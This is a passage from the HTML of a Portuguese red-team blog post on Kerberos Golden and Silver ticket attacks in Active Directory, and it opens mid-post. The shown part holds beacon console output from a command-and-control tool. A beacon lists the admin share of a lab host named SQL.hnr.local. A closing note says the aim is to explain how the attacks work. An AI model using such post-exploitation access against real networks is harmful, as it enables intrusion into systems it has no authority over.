</span><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="nf">Tasked</span><span class="w"> </span><span class="nx">beacon</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">run:</span><span class="w"> </span><span class="nx">dir</span><span class="w"> </span><span class="nx">\\SQL.hnr.local\c</span><span class="err">$</span><span class="w">
</span><span class="p">[</span><span class="o">+</span><span class="p">]</span><span class="w"> </span><span class="nf">host</span><span class="w"> </span><span class="nx">called</span><span class="w"> </span><span class="nx">home</span><span class="p">,</span><span class="w"> </span><span class="nx">sent:</span><span class="w"> </span><span class="nx">53</span><span class="w"> </span><span class="nx">bytes</span><span class="w">
</span><span class="p">[</span><span class="o">+</span><span class="p">]</span><span class="w"> </span><span class="nf">received</span><span class="w"> </span><span class="nx">output:</span><span class="w">
 </span><span class="nf">Volume</span><span class="w"> </span><span class="nx">in</span><span class="w"> </span><span class="nx">drive</span><span class="w"> </span><span class="nx">\\SQL.hnr.local\c</span><span class="err">$</span><span class="w"> </span><span class="nx">has</span><span class="w"> </span><span class="nx">no</span><span class="w"> </span><span class="nx">label.</span><span class="w">
 </span><span class="nf">Volume</span><span class="w"> </span><span class="nx">Serial</span><span class="w"> </span><span class="nx">Number</span><span class="w"> </span><span class="nx">is</span><span class="w"> </span><span class="nx">04AB-790B</span><span class="w">

 </span><span class="nf">Directory</span><span class="w"> </span><span class="nx">of</span><span class="w"> </span><span class="nx">\\SQL.hnr.local\c</span><span class="err">$</span><span class="w">

</span><span class="mi">01</span><span class="nf">/03/2020</span><span class="w">  </span><span class="nx">11:09</span><span class="w">    </span><span class="err">&lt;</span><span class="nx">DIR</span><span class="err">&gt;</span><span class="w">          </span><span class="nx">HNRDOCS</span><span class="w">
</span><span class="mi">15</span><span class="nf">/09/2018</span><span class="w">  </span><span class="nx">04:19</span><span class="w">    </span><span class="err">&lt;</span><span class="nx">DIR</span><span class="err">&gt;</span><span class="w">          </span><span class="nx">PerfLogs</span><span class="w">
</span><span class="mi">12</span><span class="nf">/02/2020</span><span class="w">  </span><span class="nx">17:07</span><span class="w">    </span><span class="err">&lt;</span><span class="nx">DIR</span><span class="err">&gt;</span><span class="w">          </span><span class="nx">Program</span><span class="w"> </span><span class="nx">Files</span><span class="w">
</span><span class="mi">12</span><span class="nf">/02/2020</span><span class="w">  </span><span class="nx">16:35</span><span class="w">    </span><span class="err">&lt;</span><span class="nx">DIR</span><span class="err">&gt;</span><span class="w">          </span><span class="nx">Program</span><span class="w"> </span><span class="nx">Files</span><span class="w"> </span><span class="p">(</span><span class="nf">x86</span><span class="p">)</span><span class="w">
</span><span class="mi">12</span><span class="nf">/02/2020</span><span class="w">  </span><span class="nx">15:34</span><span class="w">    </span><span class="err">&lt;</span><span class="nx">DIR</span><span class="err">&gt;</span><span class="w">          </span><span class="nx">SQLServer2017Media</span><span class="w">
</span><span class="mi">12</span><span class="nf">/02/2020</span><span class="w">  </span><span class="nx">15:53</span><span class="w">    </span><span class="err">&lt;</span><span class="nx">DIR</span><span class="err">&gt;</span><span class="w">          </span><span class="nx">Users</span><span class="w">
</span><span class="mi">01</span><span class="nf">/03/2020</span><span class="w">  </span><span class="nx">18:11</span><span class="w">    </span><span class="err">&lt;</span><span class="nx">DIR</span><span class="err">&gt;</span><span class="w">          </span><span class="nx">Windows</span><span class="w">
               </span><span class="mi">0</span><span class="w"> </span><span class="nf">File</span><span class="p">(</span><span class="nf">s</span><span class="p">)</span><span class="w">              </span><span class="mi">0</span><span class="w"> </span><span class="nf">bytes</span><span class="w">
               </span><span class="mi">7</span><span class="w"> </span><span class="nf">Dir</span><span class="p">(</span><span class="nf">s</span><span class="p">)</span><span class="w">  </span><span class="mf">47.061.692.416</span><span class="w"> </span><span class="nf">bytes</span><span class="w"> </span><span class="nx">free</span><span class="w">
</span></pre></table></code></div></div><p>O intuito dos posts é se fazer entender como funcionam os ataques. As ferramentas apresentadas são apenas meios para que possamos alcançar um objetivo. Espero que tenha conseguido passar com clareza todas as informações necessárias para o entendimento e sanar quaisquer dúvidas. Caso eu tenha pecado em algo, ou alguma informação não teve embasamento necessário para seu entendimento, por favor entre em contato comigo, ficarei extramente feliz em ajudar.</p><p>Até o próximo.!!!</p><h5 id="referências">Referências</h5><p>Abusing Microsoft Kerberos: Sorry You Guys Don’t Get It <a href="https://www.youtube.com/watch?v=lJQn06QLwEw">https://www.youtube.com/watch?v=lJQn06QLwEw</a></p></div><div class="post-tail-wrapper text-muted"><div class="pt-3"> <a href="/tags/kerberos/" class="post-tag no-text-decoration" >Kerberos</a> <a href="/tags/active-directory/" class="post-tag no-text-decoration" >Active Directory</a> <a href="/tags/redteam/" class="post-tag no-text-decoration" >RedTeam</a> <a href="/tags/windows/" class="post-tag no-text-decoration" >Windows</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> <span class="license-text ml-1 mr-1"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 <i class="fab fa-creative-commons"></i> <i class="fab fa-creative-commons-by"></i> </a> </span></div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label ml-1 mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Golden & Silver - ZeroDay Ranch&url=http://localhost:4000/posts/g&s/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Golden & Silver - ZeroDay Ranch&u=http://localhost:4000/posts/g&s/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Golden & Silver - ZeroDay Ranch&url=http://localhost:4000/posts/g&s/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 topbar-down"><div class="access"><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <!-- The trending tags list v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT Licensed --> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/redteam/">RedTeam</a> <a class="post-tag" href="/tags/kerberos/">Kerberos</a> <a class="post-tag" href="/tags/active-directory/">Active Directory</a> <a class="post-tag" href="/tags/writing/">writing</a> <a class="post-tag" href="/tags/typography/">typography</a> <a class="post-tag" href="/tags/hello-world/">Hello World</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-3">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/kerberos101/" class="btn btn-outline-primary"><p>Kerberos & Kerberoast</p></a> <span class="btn btn-outline-primary disabled"><p>-</p></span></div><!-- The related posts of current post. Placed in the bottom of every single post. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/kerberos101/"><div class="card-body"> <span class="timeago small"> Feb 13, 2020 <i class="unloaded">2020-02-13T20:55:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Kerberos & Kerberoast</h3><div class="text-muted small"><p>O protocolo Kerberos fornece autenticação para o ambiente de computação possibilitando flexibilidade para operar entre diversos sistemas operacionais. Em ambientes Microsoft Windows, o protocolo é ...</p></div></div></a></div></div></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const observer = lozad(); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://twitter.com/username">tuxtrack</a>. <span data-toggle="tooltip" data-placement="top" title="The blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with theme <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a>.</p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted">Trending Tags</h4><!-- The trending tags list v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT Licensed --> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/redteam/">RedTeam</a> <a class="post-tag" href="/tags/kerberos/">Kerberos</a> <a class="post-tag" href="/tags/active-directory/">Active Directory</a> <a class="post-tag" href="/tags/writing/">writing</a> <a class="post-tag" href="/tags/typography/">typography</a> <a class="post-tag" href="/tags/hello-world/">Hello World</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="http://localhost:4000{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
